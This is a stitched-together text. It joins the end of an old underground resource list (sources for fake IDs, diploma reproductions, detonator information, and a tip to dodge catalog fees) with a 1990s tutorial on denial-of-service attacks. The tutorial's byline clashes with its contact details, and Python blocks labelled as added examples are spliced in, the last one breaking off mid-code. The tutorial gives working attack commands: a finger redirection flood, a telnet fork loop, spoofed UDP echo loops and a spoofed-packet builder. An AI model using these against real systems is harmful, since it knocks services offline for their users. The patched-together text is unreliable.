Conshohocken, PA 19428

Investigative equipment and electronic surveillance items.

Ross Engineering Associates
68 Vestry Street
New York, NY 10013

Surveillance items

Edmund Scientific CO.
101 E. Gloucester Pike
Barrington, NJ 08007

Catalog of gadgets and devices including items which are useful to the
surveillance craft.

Diptronics
P.O. BOX 80
Lake Hiawatha, NJ 07034

Microwave TV Systems
Catalog costs $3

Garrison
P.O. BOX 128
Kew Gardens, NY 11415

Locksmithing tools and electronic security gadgets.
Catalog costs $2.

Bnf Enterprises
P.O. BOX 3357
Peabody, MA 01960

General electronics supplier.

Mouser Electronics
11433 Woodside avenue
Santee, CA 92071

Sells most electronic components parts and equipment.

Benchmark Knives
P.O. BOX 998
Gastonia, NC 28052

Call for a free catalog. (704-449-2222).

Excalibur Enterprises
P.O. BOX 266
Emmaus, PA 18049

Night vision devices.
Catalog costs $5

DECO INDUSTRIES
BOX 607
Bedford Hills, NY 10157

Sells miniature electronic kits.

Matthews Cutlery
38450-A N. Druid Hills RD.
Decatur, GA 30033

Their catalog contains over 1000 knives and costs $1.50.

U.S. Cavalry Store
1375 N. Wilson Road
Radcliff, KY 40160

Military & paramilitary clothing & gear.
Catalog costs $3.

The Intelligence Group
1324 West Waters Avenue
Lighthouse Point, FL 33064

Sells video equipment used for investigative purposes.

Columbia Pacific University
1415 Third Street
San Rafael, CA 94901

Bachelors, Masters, and Doctorate degrees

Video & Satellite Marketeer
P.O. BOX 21026
Columbus, OH 43221

Newsletter containing video, vcr, satellite dishes, etc.

Santa Fe Distributors
14400 W. 97th Terrace
Lenexa, KS 66215

Radar detectors and microwave tv systems.
(913-492-8288)

Alumni Arts
BOX 553
Grants Pass, OR 97526

Reproductions of college diplomas.
Catalog costs $3

Merrell Scientific CO.
1665 Buffalo Road
Rochester, NY 14624

Chemical suppliers
Catalog costs $3.

K Products
P.O. BOX 27507
San Antonio, TX 78227

I.D. Documents.
Catalog costs $1.

City News Service
P.O. BOX 86
Willow Springs, MO 65793

Press I.D. cards.
Catalog costs $3.

Matthews Police Supply CO.
P.O. BOX 1754
Matthews, NC 28105

Brass knuckles etc.

Taylor
P.O. BOX 15391
W. Palm Beach, FL 33416

Drivers license, student I.D. cards, etc.

Capri Electronics
ROUTE 1
Canon, GA 30250

Scanner accessories

Liberty Industries
BOX 279  RD 4
Quakertown, PA 18951

Pyrotechnic components
Catalog costs $1

DE VOE
P.O. BOX 32
BERLIN  PA  15530

Sells information on making electronic detonators.

Scanner World USA
10 New Scotland Avenue
Albany, NY 12208

Cheap scanner receivers.

H & W
P.O. BOX 4
Whitehall, PA 18052

Human Skulls, arms, legs, etc.
A complete list is available for $1 and Self Addressed Stamped Envelope.


Abbie-Yo Yo Inc.
P.O. Box 15
Worcester MA 01613

This is an old address that I could not verify but, they used to sell the book
"Steal This Book".

For most of these catalogs you could probably play dumb and just send them a letter asking for a catalog or brochure without paying a cent, pretending not to know that their catalogs cost anything.


M I S C E L L A N E O U S     R E P O R T S   &   P A P E R S

Crime & Puzzlement by John Perry Barlow

The Baudy World of the Byte Bandit  A Postmodernist Interpretation of the Computer Underground by Gordon Meyer & Jim Thomas

Concerning Hackers Who Break into Computer Systems by Dorothy E. Denning

The Social Organization of the Computer Underground by Gordon R. Meyer

Computer Security  "Virus Highlights Need for Improved Internet Management"
                   By the United States General Accounting Office.  GAO/IMTEC-
                   89-57
                   Call 202-275-6241 for up to 5 free copies.

N E T W O R K     D I G E S T S

Telecom Digest
        Moderator:  Patrick Townson
        Network Address:  telecom@eecs.nwu.edu

Risks Digest
        Moderator: Peter G. Neumann
        Network Address:  Risks@csl.sri.com


Virus-l Digest
        Moderator:  Kenneth R. Van Wyk
        Network Address:  krvw@cert.sei.cmu.edu

Telecom Privacy Digest
        Moderator:  Dennis G. Rears
        Network Address: telecom-priv@pica.army.mil

EFF News  Electronic Frontier Foundation
        Network Address:  effnews@eff.org
        Other Address:  155 Second Street  Cambridge, MA 02141
        Phone:  617-864-0665


Computer Underground Digest
        Moderators: Jim Thomas & Gordon Meyer
        Network Address:  tk0jut2@niu

F T P   S I T E S  C O N T A I N I N G    C  U   M A T E R I A L


192.55.239.132
128.95.136.2
128.237.253.5
130.160.20.80
130.18.64.2
128.214.5.6  "MARS Bulletin Board" Login "bbs"
128.82.8.1
128.32.152.11
128.135.12.60

All of the above accept anonymous logins!

B U L L E T I N     B O A R D S

Ripco              312-528-5020
Face-2-Face        713-242-6853
Rune Stone         203-485-0088    Home of NIA
The Works          617-861-8976
The Well           415-332-6106
Blitzkrieg         502-499-8933    Home of TAP
Uncensored         914-761-6877
Manta Lair         206-454-0075    Home of Cybertek


I N D I V I D U A L    N E T W O R K   A D D R E S S E S

Aristotle                   Former Editor of TAP Magazine
                            uk05744@ukpr.uky.edu or uk05744@ukpr.bitnet

Dorothy Denning              Author of "Concerning Hackers Who Break into
                            Computer Systems"
                            denning@src.dec.com

Clifford Stoll              Author of "The Cuckoo's Egg"
                            cliff@cfa.harvard.edu

Craig Neidorf               Former Editor of Phrack Magazine
                            c483307@umcvmb.missouri.edu

Ground Zero                 Editor of ATI Inc.
                            gzero@tronsbox.xei.com


M I S C    S O F T W A R E

SPAudit  Self-Audit-Kit
1101 Connecticut Avenue
Northwest Suite 901
Washington DC 20036
Phone 202-452-1600
Fax   202-223-8756

Free!!!

 I would like to thank everyone who gave me permission to use their information in this file.

The information provided here is for informational purposes only. What you choose to do with it is your responsibility and no one else's. That means not me, and not the BBS you downloaded this from!

To my knowledge this is the most comprehensive and up to date list of underground books, catalogs, magazines, electronic newsletters, and network addresses available. If there are any additions or corrections to this list please contact me via the Ripco BBS.

                                The Butler...


By Trivedi Jay (B E Electrical Engineer )
email : erjaytrivedi@yahoo.com

An Introduction to Denial of Service

.A. INTRODUCTION

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?

.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
.A.2.1. INTRODUCTION
.A.2.2. SUB-CULTURAL STATUS
.A.2.3. TO GAIN ACCESS
.A.2.4. REVENGE
.A.2.5. POLITICAL REASONS
.A.2.6. ECONOMICAL REASONS
.A.2.7. NASTINESS

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?


.B. SOME BASIC TARGETS FOR AN ATTACK

.B.1. SWAP SPACE
.B.2. BANDWIDTH
.B.3. KERNEL TABLES
.B.4. RAM
.B.5. DISKS
.B.6. CACHES
.B.7. INETD

.C. ATTACKING FROM THE OUTSIDE

.C.1. TAKING ADVANTAGE OF FINGER
.C.2. UDP AND SUNOS 4.1.3.
.C.3. FREEZING UP X-WINDOWS
.C.4. MALICIOUS USE OF UDP SERVICES
.C.5. ATTACKING WITH LYNX CLIENTS
.C.6. MALICIOUS USE OF telnet
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
.C.8. HOW TO DISABLE ACCOUNTS
.C.9. LINUX AND TCP TIME, DAYTIME
.C.10. HOW TO DISABLE SERVICES
.C.11. PARAGON OS BETA R1.4
.C.12. NOVELLS NETWARE FTP
.C.13. ICMP REDIRECT ATTACKS
.C.14. BROADCAST STORMS
.C.15. EMAIL BOMBING AND SPAMMING
.C.16. TIME AND KERBEROS
.C.17. THE DOT DOT BUG
.C.18. SUNOS KERNEL PANIC
.C.19. HOSTILE APPLETS
.C.20. VIRUS
.C.21. ANONYMOUS FTP ABUSE
.C.22. SYN FLOODING
.C.23. PING FLOODING
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
.C.26. FLEXlm
.C.27. BOOTING WITH TRIVIAL FTP

.D. ATTACKING FROM THE INSIDE

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
.D.2. CRASHING THE X-SERVER
.D.3. FILLING UP THE HARD DISK
.D.4. MALICIOUS USE OF eval
.D.5. MALICIOUS USE OF fork()
.D.6. CREATING FILES THAT IS HARD TO REMOVE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. CSH ATTACK
.D.9. CREATING FILES IN /tmp
.D.10. USING RESOLV_HOST_CONF
.D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT
.D.13. NETTUNE AND HP-UX
.D.14. SOLARIS 2.X AND NFS
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X

.E. DUMPING CORE

.E.1. SHORT COMMENT
.E.2. MALICIOUS USE OF NETSCAPE
.E.3. CORE DUMPED UNDER WUFTPD
.E.4. ld UNDER SOLARIS/X86

.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?

.F.1. BASIC SECURITY PROTECTION

.F.1.1. INTRODUCTION
.F.1.2. PORT SCANNING
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.5. EXTRA SECURITY SYSTEMS
.F.1.6. MONITORING SECURITY
.F.1.7. KEEPING UP TO DATE
.F.1.8. READ SOMETHING BETTER

.F.2. MONITORING PERFORMANCE

.F.2.1. INTRODUCTION
.F.2.2. COMMANDS AND SERVICES
.F.2.3. PROGRAMS
.F.2.4. ACCOUNTING

.G. SUGGESTED READING

.G.1. INFORMATION FOR DEEPER KNOWLEDGE
.G.2. KEEPING UP TO DATE INFORMATION
.G.3. BASIC INFORMATION

.H. COPYRIGHT

.I. DISCLAIMER

.0. FOREWORD
------------

In this paper I have tried to answer the following questions:

 - What is a denial of service attack?
 - Why would someone crash a system?
 - How can someone crash a system?
 - How do I protect a system against denial of service attacks?

I also have a section called SUGGESTED READING where you can find pointers to good free information that can give you a deeper understanding of a topic.

Note that I have very limited experience with Macintosh, OS/2 and Windows; most of the material is therefore for Unix.

You can always find the latest version at the following address: http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address: t95hhu@student.tdb.uu.se

.A. INTRODUCTION
~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------

A denial of service attack is knocking out a service without permission, for example by crashing the whole system. Attacks of this kind are easy to launch, and it is hard to protect a system against them. The basic problem is that Unix assumes that users on the system, and on other systems, will be well behaved.

.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
---------------------------------------

.A.2.1. INTRODUCTION
--------------------

Why would someone crash a system? I can think of several reasons, each presented in more detail in its own section below; in short:

 .1. Sub-cultural status.
 .2. To gain access.
 .3. Revenge.
 .4. Political reasons.
 .5. Economical reasons.
 .6. Nastiness.

I think that numbers one and six are the most common today, but that numbers four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS
---------------------------

After all the information about SYN flooding was published, a bunch of such attacks were launched around Sweden. The vast majority of these attacks were not part of an IP spoofing attack; they were "only" denial of service attacks. Why?

I think that hackers attack systems as a sub-cultural pseudo-career, and I think that many denial of service attacks, SYN flooding in this example, were performed for that reason. I also think that many hackers begin their career with denial of service attacks.

.A.2.3. TO GAIN ACCESS
----------------------

Sometimes a denial of service attack can be part of an attack to gain access to a system. At the moment I can think of these cases and specific holes:

 .1. Some older xlock versions could be crashed with a method from the denial of service family, leaving the system open. Physical access was needed to use the workspace afterwards.

 .2. SYN flooding could be part of an IP spoofing attack.

 .3. Some programs could have holes during startup that could be used to gain root, for example SSH (secure shell).

 .4. During an attack it could be useful to crash other machines on the network, or to deny certain persons the ability to access the system.

 .5. A system that is being booted can sometimes also be subverted, especially with rarp boots. If we know which port the machine listens on during the boot (69, the TFTP port, is a good guess) we can send false packets to it and almost totally control the boot.

.A.2.4. REVENGE
---------------

A denial of service attack could be part of revenge against a user or an administrator.

.A.2.5. POLITICAL REASONS
-------------------------

Sooner or later, new or old organizations will understand the potential of destroying computer systems and will find tools to do it.

For example, imagine bank A lending company B money to build a factory that threatens the environment. Organization C therefore crashes A's computer system, maybe with help from an employee. The attack could cost A a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS
--------------------------

Imagine the small company A moving into a business totally dominated by company B. A's and B's customers place their orders by computer and depend heavily on the order being executed at a specific time (A and B could be stock trading companies). If A or B can't perform the order, its customers lose money and change company.

As part of its business strategy A pays a computer expert a sum of money to crash B's computer systems a number of times. A year later A is the dominating company.

.A.2.7. NASTINESS
-----------------

I know a person who found a workstation where the user had forgotten to log out. He sat down and wrote a program that did a kill -9 -1 at a random time at least 30 minutes after login time, and placed a call to the program in the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------

This is a hard question to answer, and I don't think there is anything to gain from comparing different Unix platforms. You can't say that one Unix is more secure against denial of service than another; it is all up to the administrator.

A comparison between Windows 95 and NT on one side and Unix on the other could however be interesting.

Unix systems are much more complex and have hundreds of built-in programs, services and so on. This always opens up many ways to crash the system from the inside.

On a normal Windows NT or 95 network there are few ways to crash the system, although there are methods that will always work.

So no big difference between Microsoft and Unix can be seen regarding inside attacks. But there are a couple of points left:

 - Unix has many more tools and programs for discovering an attack and monitoring the users. Watching what another user is up to under Windows is very hard.

 - The average Unix administrator probably also has much more experience than the average Microsoft administrator.

These two points mean that Unix is more secure against inside denial of service attacks.

A comparison between Microsoft and Unix regarding outside attacks is much more difficult. However, I would say that the average Microsoft system on the Internet is more secure against outside attacks, because it normally runs far fewer services.

.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE
----------------

Most systems have several hundred Mbytes of swap space to service client requests. The swap space is typically used for forked child processes, which have a short lifetime. In normal use the swap space will therefore almost never be used heavily. A denial of service could be based on a method that tries to fill up the swap space.

.B.2. BANDWIDTH
---------------

If the bandwidth consumed is too high the network will be useless. Most denial of service attacks affect the bandwidth in some way.

.B.3. KERNEL TABLES
-------------------

It is trivial to overflow the kernel tables, which will cause serious problems on the system. Systems with write-through caches and small write buffers are especially sensitive.

Kernel memory allocation is also a sensitive target. The kernel has a kernelmap limit; if the system reaches this limit it cannot allocate more kernel memory and must be rebooted. Kernel memory is not only used for RAM, CPUs, screens and so on, it is also used for ordinary processes. This means that any system can be crashed, and with a mean (or in some sense good) algorithm pretty fast.

For Solaris 2.X the sar command measures and reports how much kernel memory the system is using, but SunOS 4.X has no such command, meaning that under SunOS 4.X you cannot even get a warning. If you use Solaris you can run sar -k 1 to get the information. netstat -k can also be used and shows how much memory the kernel has allocated in the subpaging.

.B.4. RAM
---------

A denial of service attack that allocates a large amount of RAM can cause a great deal of problems. NFS and mail servers are actually extremely sensitive, because they do not need much RAM and therefore often don't have much RAM. An attack on an NFS server is trivial: the normal NFS client does a great deal of caching, but an NFS client can be anything, including a program you wrote yourself...

.B.5. DISKS
-----------

A classic attack is to fill up the hard disk, but an attack on the disks can be so much more. For example, an overloaded disk can be misused in many ways.

.B.6. CACHES
-------------

A denial of service attack involving caches can be based on a method to block the cache or to bypass the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Caches information read from disk in case it is needed again.

Rnode cache: Holds information about the NFS filesystem.

Buffer cache: Caches inode indirect blocks and cylinders to reduce disk I/O.

.B.7. INETD
-----------

Once inetd has crashed, all other services running through inetd will no longer work.

.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------

Most fingerd installations support redirection to another host.

Ex:

 $ finger @system.two.com@system.one.com

In the example, finger goes through system.one.com and on to system.two.com. As far as system.two.com knows, it is system.one.com that is fingering it. So this method can be used for hiding, but also for a very dirty denial of service attack. Look at this:

 $ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again and again and again... The effect on host.we.attack is powerful: the result is high bandwidth use, little free memory and a hard disk with less free space, due to all the child processes (compare with .D.5.).

The solution is to install a fingerd that doesn't support redirection, for example GNU finger. You could also turn the finger service off, but I think that is a bit too much.
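The two server behaviours described above, as an added example that is not code from the paper or from any real fingerd. RFC 1288 lets a request line end in a chain of "@host" hops; the client strips the rightmost hop, connects to it and sends the rest, so for "finger @@@@host.we.attack" the server at host.we.attack receives "@@@". The handler that honours forwarding fingers itself once per "@"; the hardened handler refuses any hop before a socket is opened. The function names, the verdict tuples and the assumption that an empty hop name means "this host" are this example's own.

```python
"""Finger (RFC 1288) request handling with and without forwarding.

Added example, not from the paper.  A finger server reads one request
line.  RFC 1288 lets that line end in a chain of "@host" hops asking the
server to forward the query to the next host; "finger @@@@host.we.attack"
makes the client send "@@@" to host.we.attack, and a server that honours
every hop then fingers itself once per "@".  The hardened handler refuses
any hop at all, which is what the paper recommends.

Assumption (to model the attack): an empty hop name resolves to this
host, so each "@" costs the server one more connection to itself.
"""

import re

# Characters accepted in a user name; RFC 1288 leaves this to the server.
_USER_RE = re.compile(r"^[A-Za-z0-9._-]*$")


def parse_finger_request(line):
    """Split one request line into (verbose, user, hops).

    verbose: the "/W" (long output) switch was given
    user:    "" means "list the users logged in"
    hops:    forwarding chain, leftmost first; the server acts on the
             rightmost one, exactly as the client did before it
    """
    line = line.rstrip("\r\n")
    verbose = False
    if line.startswith("/W"):
        verbose = True
        line = line[2:].lstrip(" ")
    parts = line.split("@")
    user, hops = parts[0], parts[1:]
    if not _USER_RE.match(user):
        raise ValueError("bad characters in user name")
    return verbose, user, hops


def handle_forwarding(line):
    """Old behaviour: forward whenever a hop is present.

    Returns ("forward", next_host, query_to_send) or ("local", user).
    The forwarded query is one hop shorter, so "@@@" becomes "@@", then
    "@", then "", each step opening a new connection to this same host.
    """
    _, user, hops = parse_finger_request(line)
    if not hops:
        return ("local", user)
    next_host = hops[-1] or "localhost"   # assumption: empty hop == this host
    query = user + "".join("@" + h for h in hops[:-1])
    return ("forward", next_host, query)


def handle_no_forwarding(line):
    """Hardened behaviour: refuse before any socket is opened."""
    _, user, hops = parse_finger_request(line)
    if hops:
        return ("refuse", "forwarding is disabled on this host")
    return ("local", user)


if __name__ == "__main__":
    # constructed: what host.we.attack receives for "finger @@@@host.we.attack"
    received = "@@@\r\n"
    print(handle_forwarding(received))       # ('forward', 'localhost', '@@')
    print(handle_no_forwarding(received))    # ('refuse', 'forwarding is disabled on this host')
    print(handle_no_forwarding("/W alice\r\n"))
```

Note that the cost of the hardened check is one read of the request line; the old behaviour's cost is one outbound connection and one child process per "@", which is the resource drain the paragraph describes.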

.C.2. UDP AND SUNOS 4.1.3.
--------------------------

SunOS 4.1.3 is known to reboot if a packet with incorrect information in the header is sent to it. This happens if the ip_options indicate a wrong size for the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS
---------------------------

If a host accepts a telnet session to the X Windows port (generally somewhere between 6000 and 6025, in most cases 6000), that can be used to freeze up the X Windows system. This can be done with multiple telnet connections to the port, or with a program that sends multiple XOpenDisplay() calls to the port.

The same thing can happen to Motif or OpenWindows.

The solution is to deny connections to the X Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) to loop, through trivial IP spoofing. The effect can be high bandwidth use that makes the network useless. In the example the header claims that the packet came from 127.0.0.1 (loopback) and the target is the echo port at system.we.attack. As far as system.we.attack knows, 127.0.0.1 is system.we.attack itself, and the loop is established.

Ex:

 from-IP=127.0.0.1
 to-IP=system.we.attack
 Packet type: UDP
 from UDP port 7
 to UDP port 7

Note that the name system.we.attack looks like a DNS name, but in the packet the target must always be represented by its IP address.

Quoted from a comment by proberts@clark.net (Paul D. Robertson) on comp.security.firewalls on the matter of "Introduction to denial of service":

 "A great deal of systems don't put loopback on the wire, and simply emulate it. Therefore, this attack will only affect that machine in some cases. It's much better to use the address of a different machine on the same network. Again, the default services should be disabled in inetd.conf. Other than some hacks for mainframe IP stacks that don't support ICMP, the echo service isn't used by many legitimate programs, and TCP echo should be used instead of UDP where it is necessary."
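The spoofed datagram above, built as bytes, and the rule a packet filter or sensor would use to catch it, as an added example that is not code from the paper. build_udp_packet() only assembles an IPv4 and UDP header with whatever source address it is given (nothing is sent; that would need a raw socket), and classify() applies three checks to a datagram arriving from outside: a loopback or self-addressed source (the paper's case), a source inside the protected network (Robertson's variant), and a small-service port pair such as echo to chargen. The verdict strings, the local_nets parameter and the sample addresses are this example's own.

```python
"""Spoofed UDP datagrams between the "small services" (echo 7, daytime 13,
chargen 19, time 37), and the rule a filter would use to spot them.

Added example, not code from the paper.  build_udp_packet() only
assembles header bytes; classify() is the check a packet filter or
sensor applies to each datagram seen on the outside interface.
"""

import socket
import struct

SMALL_UDP_SERVICES = {7, 13, 19, 37}   # echo, daytime, chargen, time


def ipv4_checksum(header):
    """RFC 791 header checksum: one's-complement sum of 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_udp_packet(src_ip, dst_ip, src_port, dst_port, payload=b""):
    """Return IPv4 header + UDP header + payload.

    Any source address can be written into the header; nothing on the
    sending side checks it.  The UDP checksum is left at 0 ("not
    computed"), which IPv4 permits and lazy spoofing tools rely on.
    """
    udp_len = 8 + len(payload)
    udp = struct.pack("!HHHH", src_port, dst_port, udp_len, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 20 + udp_len, 0x1234, 0, 64,
                     socket.IPPROTO_UDP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    return ip + udp


def parse_udp_packet(raw):
    """Return (src_ip, dst_ip, src_port, dst_port), or None if the bytes
    are not a well-formed IPv4/UDP datagram."""
    if len(raw) < 28 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl + 8:
        return None
    if ipv4_checksum(raw[:ihl]) != 0:      # sum over a valid header is 0
        return None
    if raw[9] != socket.IPPROTO_UDP:
        return None
    src_ip = socket.inet_ntoa(raw[12:16])
    dst_ip = socket.inet_ntoa(raw[16:20])
    src_port, dst_port = struct.unpack("!HH", raw[ihl:ihl + 4])
    return src_ip, dst_ip, src_port, dst_port


def classify(raw, local_nets=()):
    """Verdict for one datagram arriving from outside the protected net.

    local_nets: address prefixes such as "192.0.2." that belong inside;
    a packet claiming such a source but arriving from outside is spoofed.
    """
    parsed = parse_udp_packet(raw)
    if parsed is None:
        return "ignore"
    src_ip, dst_ip, sport, dport = parsed
    if src_ip.startswith("127.") or src_ip == dst_ip:
        return "spoofed-self"          # the paper's 127.0.0.1 example
    if any(src_ip.startswith(p) for p in local_nets):
        return "spoofed-internal"      # "a different machine on the same network"
    if sport in SMALL_UDP_SERVICES and dport in SMALL_UDP_SERVICES:
        return "udp-service-loop"      # echo <-> chargen and friends
    return "ok"


if __name__ == "__main__":
    # constructed packets, never transmitted
    loop = build_udp_packet("127.0.0.1", "192.0.2.10", 7, 7, b"ping")
    print(parse_udp_packet(loop), classify(loop))
    cross = build_udp_packet("192.0.2.44", "192.0.2.10", 19, 7)
    print(classify(cross), classify(cross, local_nets=("192.0.2.",)))
```

The small-service port pair check is the one that survives even when the source address is a plausible outside host, which is why it is kept separate from the two spoofing checks; disabling the services in inetd.conf, as Robertson says, removes the target altogether.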

.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------

A World Wide Web server will fork an httpd process in response to a request from a client, typically Netscape or Mosaic. The process lasts for less than one second, and the load will therefore never show up if someone uses ps. In most cases it is therefore very safe to launch a denial of service attack that makes use of multiple W3 clients, typically lynx clients. But note that the netstat command can be used to detect the attack (thanks to Paul D. Robertson).

Some httpds (for example http-gw) will have problems besides the normal high bandwidth, low memory and so on, and the attack can in those cases get the server to loop (compare with .C.6.).

.C.6. MALICIOUS USE OF telnet
-----------------------------

Study this little script:

Ex:

 $ while : ; do telnet system.we.attack & done

An attack using this script might eat some bandwidth, but it is nothing compared to the finger method or most other methods. The point is that some pretty common firewalls and httpds think that the attack is a loop and shut themselves down until the administrator sends kill -HUP.

This is a simple high-risk vulnerability that should be checked for and, if present, fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------

If the attacker makes a telnet connection to the Solaris 2.4 host and quits using the telnet escape character followed by quit:

Ex:

 Control-] quit

then inetd will keep going "forever" (well, a couple of hundred times...).

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------

Some systems disable an account after N bad logins, or wait N seconds. You can use this feature to lock specific users out of the system.

.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------

inetd under Linux is known to crash if too many SYN packets are sent to daytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES
------------------------------

Most Unix systems disable a service after N sessions have been opened in a given time. Most systems have a reasonable default (let's say 800-1000), but some SunOS systems have the default set to 48...

The solution is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4
---------------------------

If someone sends an ICMP (Internet Control Message Protocol) redirect to a Paragon OS beta R1.4 host, the machine will freeze up and must be rebooted. An ICMP redirect tells the system to override its routing table; routers use it to tell a host that it is sending to the wrong router.

The solution is to install the proper patch.

.C.12. NOVELLS NETWARE FTP
--------------------------

Novell's NetWare FTP server is known to run short of memory if multiple FTP sessions connect to it.

.C.13. ICMP REDIRECT ATTACKS
----------------------------

Gateways use ICMP redirects to tell a system to override its routing table, that is, to take a better route. To be able to misuse ICMP redirection we must know of an existing connection (well, we could make one for ourselves, but there is not much use in that). If we have found a connection we can send a route that loses its connectivity, or we could send false messages to the host if the connection we have found doesn't use encryption.

Ex: (false messages to send)

 DESTINATION UNREACHABLE
 TIME TO LIVE EXCEEDED
 PARAMETER PROBLEM
 PACKET TOO BIG

The effect of such messages is a reset of the connection.

The solution could be to turn ICMP redirects off; there is not much proper use for the service.

.C.14. BROADCAST STORMS
-----------------------

This is a very popular method on networks where all of the hosts act as gateways.

There are many versions of the attack, but the basic method is to send a lot of packets to all hosts in the network with a destination that doesn't exist. Each host will try to forward each packet, so the packets will bounce around for a long time. And if new packets keep coming, the network will soon be in trouble.

Services that can be misused as tools in this kind of attack are for example ping, finger and sendmail. But most services can be misused in some way or another.

.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------

In an email bombing attack the attacker repeatedly sends identical email messages to an address. The effect on the target is high bandwidth use, a hard disk with less space, and so on... Email spamming is about sending mail to all (or rather many) of the users of a system. The point of using spamming instead of bombing is that some users will try to send a reply, and if the address is false the mail will bounce back. In that case one mail has turned into three mails. The effect on the bandwidth is obvious.

There is no way to prevent email bombing or spamming. However, have a look at CERT's paper "Email bombing and spamming".
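Bombing cannot be prevented at the receiving MTA, but it can be noticed early in the mail log, which is where an administrator would look after the first complaint. The following added example (not code from the paper or from CERT) pairs the two sendmail-style log lines written per message, "from=" with the relay that actually delivered it and "to=" with the recipient, by queue id, and flags any relay/recipient pair that exceeds a threshold inside a sliding window. It keys on the relay address rather than the envelope sender because the sender is under the bomber's control. The log lines, threshold, window and the 1996 year used for timestamp parsing are constructed for this example.

```python
"""Spot an email bomb in sendmail-style logs.

Added example, not code from the paper.  The log lines produced by
constructed_log() imitate the two-line sendmail format: one "from="
line and one "to=" line per queue id, both carrying the same id.

Rule: more than THRESHOLD messages from the same relay to the same
recipient within WINDOW seconds is flagged.  The envelope sender is
ignored on purpose; the bomber chooses it, but the relay IP in the
from= line is what the MTA actually observed on the wire.
"""

import re
from collections import defaultdict, deque
from datetime import datetime

THRESHOLD = 20      # messages (assumed value for this example)
WINDOW = 60         # seconds (assumed value for this example)

_LINE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sendmail\[\d+\]: (\w+): (.*)$")
_FROM = re.compile(r"from=<([^>]*)>.*relay=\S+ \[([\d.]+)\]")
_TO = re.compile(r"to=<([^>]*)>")


def parse_sendmail_log(lines, year=1996):
    """Yield (timestamp, relay_ip, recipient) for each delivered message.

    from= and to= lines are paired by queue id; unmatched lines are
    skipped.  syslog timestamps carry no year, so one is supplied.
    """
    pending = {}
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        qid, rest = m.group(2), m.group(3)
        f = _FROM.search(rest)
        if f:
            pending[qid] = f.group(2)          # remember the relay for this id
            continue
        t = _TO.search(rest)
        if t and qid in pending:
            yield ts, pending.pop(qid), t.group(1)


def detect_bombing(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {(relay_ip, recipient): peak_count} for pairs over threshold."""
    recent = defaultdict(deque)                # (relay, rcpt) -> timestamps
    alerts = {}
    for ts, relay, rcpt in parse_sendmail_log(lines):
        q = recent[(relay, rcpt)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # slide the window
            q.popleft()
        if len(q) > threshold:
            alerts[(relay, rcpt)] = max(alerts.get((relay, rcpt), 0), len(q))
    return alerts


def constructed_log(n_bomb=30):
    """Constructed sample: n_bomb identical messages one second apart from
    relay 192.0.2.77, followed by one unrelated delivery."""
    lines = []
    for i in range(n_bomb):
        ts, qid, pid = f"Nov 16 09:50:{i:02d}", f"gAGHo{i:05d}", 1000 + i
        lines.append(f"{ts} mailhost sendmail[{pid}]: {qid}: from=<nobody@bogus.invalid>, "
                     f"size=512, class=0, nrcpts=1, proto=SMTP, relay=bomber.example [192.0.2.77]")
        lines.append(f"{ts} mailhost sendmail[{pid}]: {qid}: to=<victim@example.com>, "
                     f"delay=00:00:00, mailer=local, stat=Sent")
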